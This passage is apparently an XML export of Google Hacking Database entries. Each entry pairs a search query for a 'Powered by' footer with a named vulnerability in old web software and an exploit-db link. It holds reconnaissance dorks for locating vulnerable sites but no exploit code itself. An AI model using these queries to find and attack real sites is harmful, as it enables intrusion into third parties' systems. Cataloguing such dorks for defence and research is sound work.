<textualDescription>MVC-Web CMS 1.0/1.2 (index.asp newsid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5912</textualDescription>
<query>Powered by MVC-Web CMS inurl:/index.asp?newsid=</query>
<querystring>https://www.google.com/search?q=Powered+by+MVC-Web+CMS++inurl:/index.asp%3Fnewsid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/5912</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2897</id>
<link>https://www.exploit-db.com/ghdb/2897</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by MyHobbySite 1.01</shortDescription>
<textualDescription>MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: https://www.exploit-db.com/exploits/14977</textualDescription>
<query>Powered by MyHobbySite 1.01</query>
<querystring>https://www.google.com/search?q=Powered+by+MyHobbySite+1.01</querystring>
<edb>https://www.exploit-db.com/exploits/14977</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3312</id>
<link>https://www.exploit-db.com/ghdb/3312</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by MyPHP Forum v3.0</shortDescription>
<textualDescription>MyPHP Forum 3.0 (Final) Remote SQL Injection Vulnerability - CVE: 2008-0099: https://www.exploit-db.com/exploits/4831</textualDescription>
<query>Powered by MyPHP Forum v3.0</query>
<querystring>https://www.google.com/search?q=Powered+by+MyPHP+Forum+v3.0</querystring>
<edb>https://www.exploit-db.com/exploits/4831</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1768</id>
<link>https://www.exploit-db.com/ghdb/1768</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by NATTERCHAT v 1.1</shortDescription>
<textualDescription>NatterChat 1.1 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7172</textualDescription>
<query>Powered by NATTERCHAT v 1.1</query>
<querystring>https://www.google.com/search?q=Powered+by+NATTERCHAT+v+1.1</querystring>
<edb>https://www.exploit-db.com/exploits/7172</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1615</id>
<link>https://www.exploit-db.com/ghdb/1615</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Natterchat v1.12</shortDescription>
<textualDescription>Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: https://www.exploit-db.com/exploits/7175</textualDescription>
<query>Powered by Natterchat v1.12</query>
<querystring>https://www.google.com/search?q=Powered+by+Natterchat+v1.12</querystring>
<edb>https://www.exploit-db.com/exploits/7175</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3289</id>
<link>https://www.exploit-db.com/ghdb/3289</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Ninja Designs This is a port of WordPress</shortDescription>
<textualDescription>Ninja Blog v4.8 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/10991</textualDescription>
<query>Powered by Ninja Designs This is a port of WordPress</query>
<querystring>https://www.google.com/search?q=Powered+by+Ninja+Designs+This+is+a+port+of+WordPress</querystring>
<edb>https://www.exploit-db.com/exploits/10991</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2542</id>
<link>https://www.exploit-db.com/ghdb/2542</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by NKINFOWEB VSp © 2009</shortDescription>
<textualDescription>NKINFOWEB SQL Injection - CVE: 2010-1599: https://www.exploit-db.com/exploits/12354</textualDescription>
<query>Powered by NKINFOWEB VSp © 2009</query>
<querystring>https://www.google.com/search?q=Powered+by+NKINFOWEB+VSp+%C2%A9+2009</querystring>
<edb>https://www.exploit-db.com/exploits/12354</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2501</id>
<link>https://www.exploit-db.com/ghdb/2501</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by odlican.net cms v.1.5</shortDescription>
<textualDescription>odlican.net cms v.1.5 Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11340</textualDescription>
<query>Powered by odlican.net cms v.1.5</query>
<querystring>https://www.google.com/search?q=Powered+by+odlican.net+cms+v.1.5</querystring>
<edb>https://www.exploit-db.com/exploits/11340</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3056</id>
<link>https://www.exploit-db.com/ghdb/3056</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by One-News</shortDescription>
<textualDescription>OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/6292</textualDescription>
<query>Powered by One-News</query>
<querystring>https://www.google.com/search?q=Powered+by+One-News</querystring>
<edb>https://www.exploit-db.com/exploits/6292</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2467</id>
<link>https://www.exploit-db.com/ghdb/2467</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Online Email Manager</shortDescription>
<textualDescription>Online Email Manager Insecure Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/8476</textualDescription>
<query>Powered by Online Email Manager</query>
<querystring>https://www.google.com/search?q=Powered+by+Online+Email+Manager</querystring>
<edb>https://www.exploit-db.com/exploits/8476</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2529</id>
<link>https://www.exploit-db.com/ghdb/2529</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Online Guestbook Pro</shortDescription>
<textualDescription>Online Guestbook Pro (display) Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8475</textualDescription>
<query>Powered by Online Guestbook Pro</query>
<querystring>https://www.google.com/search?q=Powered+by+Online+Guestbook+Pro</querystring>
<edb>https://www.exploit-db.com/exploits/8475</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3174</id>
<link>https://www.exploit-db.com/ghdb/3174</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Orbis CMS</shortDescription>
<textualDescription>Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/9309</textualDescription>
<query>Powered by Orbis CMS</query>
<querystring>https://www.google.com/search?q=Powered+by+Orbis+CMS</querystring>
<edb>https://www.exploit-db.com/exploits/9309</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2789</id>
<link>https://www.exploit-db.com/ghdb/2789</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by osCommerce</shortDescription>
<textualDescription>osCommerce Online Merchant 2.2 RC2a Code Execution: https://www.exploit-db.com/exploits/9556</textualDescription>
<query>Powered by osCommerce</query>
<querystring>https://www.google.com/search?q=Powered+by+osCommerce</querystring>
<edb>https://www.exploit-db.com/exploits/9556</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3053</id>
<link>https://www.exploit-db.com/ghdb/3053</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by osCommerce | Customized by EZ-Oscommerce</shortDescription>
<textualDescription>EZ-Oscommerce 3.1 Remote File Upload: https://www.exploit-db.com/exploits/14415</textualDescription>
<query>Powered by osCommerce | Customized by EZ-Oscommerce</query>
<querystring>https://www.google.com/search?q=Powered+by+osCommerce+|+Customized+by+EZ-Oscommerce</querystring>
<edb>https://www.exploit-db.com/exploits/14415</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1561</id>
<link>https://www.exploit-db.com/ghdb/1561</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by osCSS</shortDescription>
<textualDescription>osCSS v1.2.1 Database Backups Disclosure: https://www.exploit-db.com/exploits/11612</textualDescription>
<query>Powered by osCSS</query>
<querystring>https://www.google.com/search?q=Powered+by+osCSS</querystring>
<edb>https://www.exploit-db.com/exploits/11612</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1889</id>
<link>https://www.exploit-db.com/ghdb/1889</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PacerCMS</shortDescription>
<textualDescription>PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5098</textualDescription>
<query>Powered by PacerCMS</query>
<querystring>https://www.google.com/search?q=Powered+by+PacerCMS</querystring>
<edb>https://www.exploit-db.com/exploits/5098</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2864</id>
<link>https://www.exploit-db.com/ghdb/2864</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PBBoard© 2009 Version 2.0.5</shortDescription>
<textualDescription>PBBoard Version 2.0.5 Mullti Vulnerability: https://www.exploit-db.com/exploits/11570</textualDescription>
<query>Powered by PBBoard© 2009 Version 2.0.5</query>
<querystring>https://www.google.com/search?q=Powered+by+PBBoard%C2%A9+2009+Version+2.0.5</querystring>
<edb>https://www.exploit-db.com/exploits/11570</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2794</id>
<link>https://www.exploit-db.com/ghdb/2794</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea</shortDescription>
<textualDescription>PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11613</textualDescription>
<query>Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+Advanced+Transfer+Manager+v1.10+-+%402002+Bugada+Andrea</querystring>
<edb>https://www.exploit-db.com/exploits/11613</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2315</id>
<link>https://www.exploit-db.com/ghdb/2315</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by Php Blue Dragon Platinum</shortDescription>
<textualDescription>Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: https://www.exploit-db.com/exploits/1779</textualDescription>
<query>powered by Php Blue Dragon Platinum</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=powered+by+Php+Blue+Dragon+Platinum</querystring>
<edb>https://www.exploit-db.com/exploits/1779</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2347</id>
<link>https://www.exploit-db.com/ghdb/2347</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP Dir Submit - Directory Submission Script</shortDescription>
<textualDescription>PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: https://www.exploit-db.com/exploits/9484</textualDescription>
<query>Powered by PHP Dir Submit - Directory Submission Script</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+Dir+Submit+-+Directory+Submission+Script</querystring>
<edb>https://www.exploit-db.com/exploits/9484</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3319</id>
<link>https://www.exploit-db.com/ghdb/3319</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP F1 (Max's Image Uploader)</shortDescription>
<textualDescription>Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: https://www.exploit-db.com/exploits/11169</textualDescription>
<query>Powered by PHP F1 (Max's Image Uploader)</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+F1+(Max's+Image+Uploader)</querystring>
<edb>https://www.exploit-db.com/exploits/11169</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3322</id>
<link>https://www.exploit-db.com/ghdb/3322</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP F1 (Max's Photo Album)</shortDescription>
<textualDescription>Max's Photo Album Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11557</textualDescription>
<query>Powered by PHP F1 (Max's Photo Album)</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+F1+(Max's+Photo+Album)</querystring>
<edb>https://www.exploit-db.com/exploits/11557</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2734</id>
<link>https://www.exploit-db.com/ghdb/2734</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP Image Gallery</shortDescription>
<textualDescription>SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: https://www.exploit-db.com/exploits/7021</textualDescription>
<query>Powered by PHP Image Gallery</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+Image+Gallery</querystring>
<edb>https://www.exploit-db.com/exploits/7021</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1862</id>
<link>https://www.exploit-db.com/ghdb/1862</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP Links from DeltaScripts</shortDescription>
<textualDescription>PHP Links 1.3 (vote.php id) Remote SQL Injection Vulnerability - CVE: 2008-0565: https://www.exploit-db.com/exploits/5021</textualDescription>
<query>Powered by PHP Links from DeltaScripts</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+Links+from+DeltaScripts</querystring>
<edb>https://www.exploit-db.com/exploits/5021</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2614</id>
<link>https://www.exploit-db.com/ghdb/2614</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP Melody 1.5.3</shortDescription>
<textualDescription>blog ink Bypass Setting Vulnerability: https://www.exploit-db.com/exploits/11462</textualDescription>
<query>Powered by PHP Melody 1.5.3</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+Melody+1.5.3</querystring>
<edb>https://www.exploit-db.com/exploits/11462</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1488</id>
<link>https://www.exploit-db.com/ghdb/1488</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP upload - unijimpe.</shortDescription>
<textualDescription>PHP upload - (unijimpe) Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/10732</textualDescription>
<query>Powered by PHP upload - unijimpe.</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP+upload+-+unijimpe.</querystring>
<edb>https://www.exploit-db.com/exploits/10732</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1152</id>
<link>https://www.exploit-db.com/ghdb/1152</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk</shortDescription>
<textualDescription>this is the dork: Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.ukas it is, without quotes, for the version I tested, prone toSQL Injection / administrative credentials disclosurethis my advisory/poc exploit: http://rgod.altervista.org/phpfusion600109.html</textualDescription>
<query>Powered by PHP-Fusion v6.00.109 © 2003-2005. -php-fusion.co.uk</query>
<querystring>https://www.google.com/search?q=Powered+by+PHP-Fusion+v6.00.109+%C2%A9+2003-2005.+-php-fusion.co.uk</querystring>
<edb></edb>
<date>2005-09-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>2200</id>
<link>https://www.exploit-db.com/ghdb/2200</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By phpCOIN 1.2.3</shortDescription>
<textualDescription>phpCOIN 1.2.3 (session_set.php) Remote Include Vulnerability - CVE: 2006-4424: https://www.exploit-db.com/exploits/2254</textualDescription>
<query>Powered By phpCOIN 1.2.3</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By+phpCOIN+1.2.3</querystring>
<edb>https://www.exploit-db.com/exploits/2254</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1534</id>
<link>https://www.exploit-db.com/ghdb/1534</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by phpDatingClub</shortDescription>
<textualDescription>phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: https://www.exploit-db.com/exploits/6037</textualDescription>
<query>Powered by phpDatingClub</query>
<querystring>https://www.google.com/search?q=Powered+by+phpDatingClub</querystring>
<edb>https://www.exploit-db.com/exploits/6037</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3249</id>
<link>https://www.exploit-db.com/ghdb/3249</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By PHPDug version 2.0.0</shortDescription>
<textualDescription>PHPDug version 2.0.0 Cross Site Scripting Vulnerability: https://www.exploit-db.com/exploits/11017</textualDescription>
<query>Powered By PHPDug version 2.0.0</query>
<querystring>https://www.google.com/search?q=Powered+By+PHPDug+version+2.0.0</querystring>
<edb>https://www.exploit-db.com/exploits/11017</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2525</id>
<link>https://www.exploit-db.com/ghdb/2525</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber</shortDescription>
<textualDescription>phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability - CVE: 2007-5754: https://www.exploit-db.com/exploits/4588</textualDescription>
<query>Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber</query>
<querystring>https://www.google.com/search?q=Powered+by+phpFaber+URLInn.+Copyright+%C3%82%C2%A9+2004-2006+phpFaber</querystring>
<edb>https://www.exploit-db.com/exploits/4588</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3340</id>
<link>https://www.exploit-db.com/ghdb/3340</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By PHPFanBase</shortDescription>
<textualDescription>PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2957</textualDescription>
<query>Powered By PHPFanBase</query>
<querystring>https://www.google.com/search?q=Powered+By+PHPFanBase</querystring>
<edb>https://www.exploit-db.com/exploits/2957</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2235</id>
<link>https://www.exploit-db.com/ghdb/2235</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By PHPhotoalbum</shortDescription>
<textualDescription>PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: https://www.exploit-db.com/exploits/10584</textualDescription>
<query>Powered By PHPhotoalbum</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+By+PHPhotoalbum</querystring>
<edb>https://www.exploit-db.com/exploits/10584</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2641</id>
<link>https://www.exploit-db.com/ghdb/2641</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by PhpMesFilms</shortDescription>
<textualDescription>PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: https://www.exploit-db.com/exploits/7660</textualDescription>
<query>powered by PhpMesFilms</query>
<querystring>https://www.google.com/search?q=powered+by+PhpMesFilms</querystring>
<edb>https://www.exploit-db.com/exploits/7660</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2615</id>
<link>https://www.exploit-db.com/ghdb/2615</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by phpMyDesktop|arcade v1.0 (final)</shortDescription>
<textualDescription>PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability: https://www.exploit-db.com/exploits/4755</textualDescription>
<query>Powered by phpMyDesktop|arcade v1.0 (final)</query>
<querystring>https://www.google.com/search?q=Powered+by+phpMyDesktop|arcade+v1.0+(final)</querystring>
<edb>https://www.exploit-db.com/exploits/4755</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2889</id>
<link>https://www.exploit-db.com/ghdb/2889</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by phpMyRealty</shortDescription>
<textualDescription>phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: https://www.exploit-db.com/exploits/4750</textualDescription>
<query>Powered by phpMyRealty</query>
<querystring>https://www.google.com/search?q=Powered+by+phpMyRealty</querystring>
<edb>https://www.exploit-db.com/exploits/4750</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2027</id>
<link>https://www.exploit-db.com/ghdb/2027</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By phUploader</shortDescription>
<textualDescription>phUploader Remote File Upload Vulnerability - CVE: 2007-4527: https://www.exploit-db.com/exploits/10574</textualDescription>
<query>Powered By phUploader</query>
<querystring>https://www.google.com/search?q=Powered+By+phUploader</querystring>
<edb>https://www.exploit-db.com/exploits/10574</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2160</id>
<link>https://www.exploit-db.com/ghdb/2160</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by Pixaria. Gallery</shortDescription>
<textualDescription>Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability - CVE: 2007-2457: https://www.exploit-db.com/exploits/3733</textualDescription>
<query>powered by Pixaria. Gallery</query>
<querystring>https://www.google.com/search?q=powered+by+Pixaria.+Gallery</querystring>
<edb>https://www.exploit-db.com/exploits/3733</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2278</id>
<link>https://www.exploit-db.com/ghdb/2278</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Platinum 7.6.b.5</shortDescription>
<textualDescription>PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: https://www.exploit-db.com/exploits/4563</textualDescription>
<query>Powered by Platinum 7.6.b.5</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+Platinum+7.6.b.5</querystring>
<edb>https://www.exploit-db.com/exploits/4563</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2736</id>
<link>https://www.exploit-db.com/ghdb/2736</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By Pligg | Legal: License and Source</shortDescription>
<textualDescription>Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: https://www.exploit-db.com/exploits/6146</textualDescription>
<query>Powered By Pligg | Legal: License and Source</query>
<querystring>https://www.google.com/search?q=Powered+By+Pligg+|+Legal:+License+and+Source</querystring>
<edb>https://www.exploit-db.com/exploits/6146</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2318</id>
<link>https://www.exploit-db.com/ghdb/2318</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Plogger!</shortDescription>
<textualDescription>Plogger Remote File Disclosure Vulnerability: https://www.exploit-db.com/exploits/14636</textualDescription>
<query>Powered by Plogger!</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=Powered+by+Plogger!</querystring>
<edb>https://www.exploit-db.com/exploits/14636</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1865</id>
<link>https://www.exploit-db.com/ghdb/1865</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PNphpBB2 / Powered por PNphpBB2</shortDescription>
<textualDescription>PNphpBB2 1.2g (phpbb_root_path) Remote File Include Vulnerability - CVE: 2006-4968: https://www.exploit-db.com/exploits/2390</textualDescription>
<query>Powered by PNphpBB2 / Powered por PNphpBB2</query>
<querystring>https://www.google.com/search?q=Powered+by+PNphpBB2+/+Powered+por+PNphpBB2</querystring>
<edb>https://www.exploit-db.com/exploits/2390</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2923</id>
<link>https://www.exploit-db.com/ghdb/2923</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By Power Editor</shortDescription>
<textualDescription>Power Editor 2.0 Remote File Disclosure / Edit Vulnerability - CVE: 2008-2116: https://www.exploit-db.com/exploits/5549</textualDescription>
<query>Powered By Power Editor</query>
<querystring>https://www.google.com/search?q=Powered+By+Power+Editor</querystring>
<edb>https://www.exploit-db.com/exploits/5549</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2060</id>
<link>https://www.exploit-db.com/ghdb/2060</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by PowerPortal v1.3a</shortDescription>
<textualDescription>PowerPortal 1.3a (index.php) Remote File Include Vulnerability - CVE: 2006-5126: https://www.exploit-db.com/exploits/2454</textualDescription>
<query>Powered by PowerPortal v1.3a</query>
<querystring>https://www.google.com/search?q=Powered+by+PowerPortal+v1.3a</querystring>
<edb>https://www.exploit-db.com/exploits/2454</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3226</id>
<link>https://www.exploit-db.com/ghdb/3226</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>powered by QT-cute v1.2</shortDescription>
<textualDescription>QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12817</textualDescription>
<query>powered by QT-cute v1.2</query>
<querystring>https://www.google.com/search?q=powered+by+QT-cute+v1.2</querystring>
<edb>https://www.exploit-db.com/exploits/12817</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1555</id>
<link>https://www.exploit-db.com/ghdb/1555</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by React - www.react.nl</shortDescription>
<textualDescription>React software [local file inclusion]: https://www.exploit-db.com/exploits/11943</textualDescription>
<query>Powered by React - www.react.nl</query>
<querystring>https://www.google.com/search?q=Powered+by+React+-+www.react.nl</querystring>
<edb>https://www.exploit-db.com/exploits/11943</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2024</id>
<link>https://www.exploit-db.com/ghdb/2024</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Revsense</shortDescription>
<textualDescription>RevSense (Auth bypass) Remote SQL Injection Vulnerability - CVE: 2008-6309: https://www.exploit-db.com/exploits/7163</textualDescription>
<query>Powered by Revsense</query>
<querystring>https://www.google.com/search?q=Powered+by+Revsense</querystring>
<edb>https://www.exploit-db.com/exploits/7163</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2152</id>
<link>https://www.exploit-db.com/ghdb/2152</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by sabros.us</shortDescription>
<textualDescription>sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability - CVE: 2008-1799: https://www.exploit-db.com/exploits/5360</textualDescription>
<query>Powered by sabros.us</query>
<querystring>https://www.google.com/search?q=Powered+by+sabros.us</querystring>
<edb>https://www.exploit-db.com/exploits/5360</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2747</id>
<link>https://www.exploit-db.com/ghdb/2747</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered By SalSa Creations</shortDescription>
<textualDescription>ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: https://www.exploit-db.com/exploits/7128</textualDescription>
<query>Powered By SalSa Creations</query>
<querystring>https://www.google.com/search?q=Powered+By+SalSa+Creations</querystring>
<edb>https://www.exploit-db.com/exploits/7128</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2514</id>
<link>https://www.exploit-db.com/ghdb/2514</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SAPID CMF Build 87</shortDescription>
<textualDescription>SAPID CMF Build 87 (last_module) Remote Code Execution Vulnerability - CVE: 2007-5056: https://www.exploit-db.com/exploits/5097</textualDescription>
<query>Powered by SAPID CMF Build 87</query>
<querystring>https://www.google.com/search?q=Powered+by+SAPID+CMF+Build+87</querystring>
<edb>https://www.exploit-db.com/exploits/5097</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1859</id>
<link>https://www.exploit-db.com/ghdb/1859</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by SH-News 3.0</shortDescription>
<textualDescription>SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability - CVE: 2007-6391: https://www.exploit-db.com/exploits/4709</textualDescription>
<query>Powered by SH-News 3.0</query>
<querystring>https://www.google.com/search?q=Powered+by+SH-News+3.0</querystring>
<edb>https://www.exploit-db.com/exploits/4709</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2089</id>
<link>https://www.exploit-db.com/ghdb/2089</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Shadowed Portal</shortDescription>
<textualDescription>Shadowed Portal 5.7d3 (POST) Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/4769</textualDescription>
<query>Powered by Shadowed Portal</query>
<querystring>https://www.google.com/search?q=Powered+by+Shadowed+Portal</querystring>
<edb>https://www.exploit-db.com/exploits/4769</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1706</id>
<link>https://www.exploit-db.com/ghdb/1706</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>Powered by Sisfo Kampus 2006</shortDescription>
<textualDescription>Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln - CVE: 2007-4820: https://www.exploit-db.com/exploits/4380</textualDescription>
<query>Powered by Sisfo Kampus 2006</query>
<querystring>https://www.google.com/search?q=Powered+by+Sisfo+Kampus+2006</querystring>
<edb>https://www.exploit-db.com/exploits/4380</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1456</id>
<link>https://www.exploit-db.com/ghdb/1456</link>
